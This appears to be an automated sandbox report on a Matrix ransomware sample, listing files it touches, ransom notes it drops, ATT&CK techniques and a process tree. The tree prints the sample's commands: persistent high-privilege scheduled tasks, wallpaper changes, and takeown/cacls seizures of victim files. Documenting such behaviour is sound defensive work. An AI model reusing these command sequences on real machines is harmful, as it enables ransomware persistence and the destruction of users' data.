File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Manila	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1420 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1772 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

mVSen3Ss64.exe

pid process

1444 mVSen3Ss64.exe
1444 mVSen3Ss64.exe
1444 mVSen3Ss64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

mVSen3Ss64.exe

pid process

1444 mVSen3Ss64.exe

pid	process
1420	schtasks.exe

pid	process
1772	vssadmin.exe

pid	process
1444	mVSen3Ss64.exe
1444	mVSen3Ss64.exe
1444	mVSen3Ss64.exe

pid	process
1444	mVSen3Ss64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mVSen3Ss64.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1444	mVSen3Ss64.exe
Token: SeLoadDriverPrivilege	1444	mVSen3Ss64.exe
Token: SeTakeOwnershipPrivilege	572	takeown.exe
Token: SeTakeOwnershipPrivilege	2160	takeown.exe
Token: SeTakeOwnershipPrivilege	1876	takeown.exe
Token: SeTakeOwnershipPrivilege	1864	takeown.exe
Token: SeTakeOwnershipPrivilege	2160	takeown.exe
Token: SeTakeOwnershipPrivilege	3720	takeown.exe
Token: SeBackupPrivilege	3168	vssvc.exe
Token: SeRestorePrivilege	3168	vssvc.exe
Token: SeAuditPrivilege	3168	vssvc.exe
Token: SeTakeOwnershipPrivilege	3804	takeown.exe
Token: SeTakeOwnershipPrivilege	2604	takeown.exe
Token: SeTakeOwnershipPrivilege	3164	takeown.exe
Token: SeTakeOwnershipPrivilege	2020	takeown.exe
Token: SeTakeOwnershipPrivilege	2920	takeown.exe
Token: SeTakeOwnershipPrivilege	720	takeown.exe
Token: SeIncreaseQuotaPrivilege	1824	WMIC.exe
Token: SeSecurityPrivilege	1824	WMIC.exe
Token: SeTakeOwnershipPrivilege	1824	WMIC.exe
Token: SeLoadDriverPrivilege	1824	WMIC.exe
Token: SeSystemProfilePrivilege	1824	WMIC.exe
Token: SeSystemtimePrivilege	1824	WMIC.exe
Token: SeProfSingleProcessPrivilege	1824	WMIC.exe
Token: SeIncBasePriorityPrivilege	1824	WMIC.exe
Token: SeCreatePagefilePrivilege	1824	WMIC.exe
Token: SeBackupPrivilege	1824	WMIC.exe
Token: SeRestorePrivilege	1824	WMIC.exe
Token: SeShutdownPrivilege	1824	WMIC.exe
Token: SeDebugPrivilege	1824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1824	WMIC.exe
Token: SeRemoteShutdownPrivilege	1824	WMIC.exe
Token: SeUndockPrivilege	1824	WMIC.exe
Token: SeManageVolumePrivilege	1824	WMIC.exe
Token: 33	1824	WMIC.exe
Token: 34	1824	WMIC.exe
Token: 35	1824	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1824	WMIC.exe
Token: SeSecurityPrivilege	1824	WMIC.exe
Token: SeTakeOwnershipPrivilege	1824	WMIC.exe
Token: SeLoadDriverPrivilege	1824	WMIC.exe
Token: SeSystemProfilePrivilege	1824	WMIC.exe
Token: SeSystemtimePrivilege	1824	WMIC.exe
Token: SeProfSingleProcessPrivilege	1824	WMIC.exe
Token: SeIncBasePriorityPrivilege	1824	WMIC.exe
Token: SeCreatePagefilePrivilege	1824	WMIC.exe
Token: SeBackupPrivilege	1824	WMIC.exe
Token: SeRestorePrivilege	1824	WMIC.exe
Token: SeShutdownPrivilege	1824	WMIC.exe
Token: SeDebugPrivilege	1824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1824	WMIC.exe
Token: SeRemoteShutdownPrivilege	1824	WMIC.exe
Token: SeUndockPrivilege	1824	WMIC.exe
Token: SeManageVolumePrivilege	1824	WMIC.exe
Token: 33	1824	WMIC.exe
Token: 34	1824	WMIC.exe
Token: 35	1824	WMIC.exe
Token: SeTakeOwnershipPrivilege	296	takeown.exe
Token: SeTakeOwnershipPrivilege	2076	takeown.exe
Token: SeTakeOwnershipPrivilege	816	takeown.exe
Token: SeTakeOwnershipPrivilege	4048	takeown.exe
Token: SeTakeOwnershipPrivilege	1976	takeown.exe
Token: SeTakeOwnershipPrivilege	3952	takeown.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.execmd.execmd.exewscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2296 wrote to memory of 2168	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2168	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2168	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2168	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2608	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWPbIiay.exe
PID 2296 wrote to memory of 2608	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWPbIiay.exe
PID 2296 wrote to memory of 2608	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWPbIiay.exe
PID 2296 wrote to memory of 2608	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWPbIiay.exe
PID 2296 wrote to memory of 2484	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2484	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2484	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2484	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2504	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2504	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2504	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2504	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2484 wrote to memory of 2736	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 2736	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 2736	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 2736	2484	cmd.exe	reg.exe
PID 2504 wrote to memory of 1056	2504	cmd.exe	wscript.exe
PID 2504 wrote to memory of 1056	2504	cmd.exe	wscript.exe
PID 2504 wrote to memory of 1056	2504	cmd.exe	wscript.exe
PID 2504 wrote to memory of 1056	2504	cmd.exe	wscript.exe
PID 2484 wrote to memory of 2852	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 2852	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 2852	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 2852	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 1356	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 1356	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 1356	2484	cmd.exe	reg.exe
PID 2484 wrote to memory of 1356	2484	cmd.exe	reg.exe
PID 2296 wrote to memory of 700	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 700	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 700	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 700	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 1056 wrote to memory of 2632	1056	wscript.exe	cmd.exe
PID 1056 wrote to memory of 2632	1056	wscript.exe	cmd.exe
PID 1056 wrote to memory of 2632	1056	wscript.exe	cmd.exe
PID 1056 wrote to memory of 2632	1056	wscript.exe	cmd.exe
PID 700 wrote to memory of 968	700	cmd.exe	cacls.exe
PID 700 wrote to memory of 968	700	cmd.exe	cacls.exe
PID 700 wrote to memory of 968	700	cmd.exe	cacls.exe
PID 700 wrote to memory of 968	700	cmd.exe	cacls.exe
PID 2632 wrote to memory of 1420	2632	cmd.exe	schtasks.exe
PID 2632 wrote to memory of 1420	2632	cmd.exe	schtasks.exe
PID 2632 wrote to memory of 1420	2632	cmd.exe	schtasks.exe
PID 2632 wrote to memory of 1420	2632	cmd.exe	schtasks.exe
PID 700 wrote to memory of 1448	700	cmd.exe	takeown.exe
PID 700 wrote to memory of 1448	700	cmd.exe	takeown.exe
PID 700 wrote to memory of 1448	700	cmd.exe	takeown.exe
PID 700 wrote to memory of 1448	700	cmd.exe	takeown.exe
PID 2296 wrote to memory of 2636	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2636	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2636	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2296 wrote to memory of 2636	2296	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2636 wrote to memory of 1616	2636	cmd.exe	cacls.exe
PID 2636 wrote to memory of 1616	2636	cmd.exe	cacls.exe
PID 2636 wrote to memory of 1616	2636	cmd.exe	cacls.exe
PID 2636 wrote to memory of 1616	2636	cmd.exe	cacls.exe
PID 2636 wrote to memory of 2388	2636	cmd.exe	takeown.exe
PID 2636 wrote to memory of 2388	2636	cmd.exe	takeown.exe
PID 2636 wrote to memory of 2388	2636	cmd.exe	takeown.exe
PID 2636 wrote to memory of 2388	2636	cmd.exe	takeown.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
"C:\Users\Admin\AppData\Local\Temp\335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe" "C:\Users\Admin\AppData\Local\Temp\NWPbIiay.exe"
  2⤵
  PID:2168
- C:\Users\Admin\AppData\Local\Temp\NWPbIiay.exe
  "C:\Users\Admin\AppData\Local\Temp\NWPbIiay.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nOq0xSWV.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nOq0xSWV.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1356
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\8KUycya9.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\8KUycya9.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1056
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\WUm6JQop.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2632
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\WUm6JQop.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1420
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:2864
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2172
    - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss64.exe
        
        mVSen3Ss.exe -accepteula "SignHere.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2508
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1328
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1220
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:2100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2644
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2508
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:2468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    - Modifies file permissions
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1648
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:2156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1400
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:2692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:2568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2728
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:2852
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:332
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
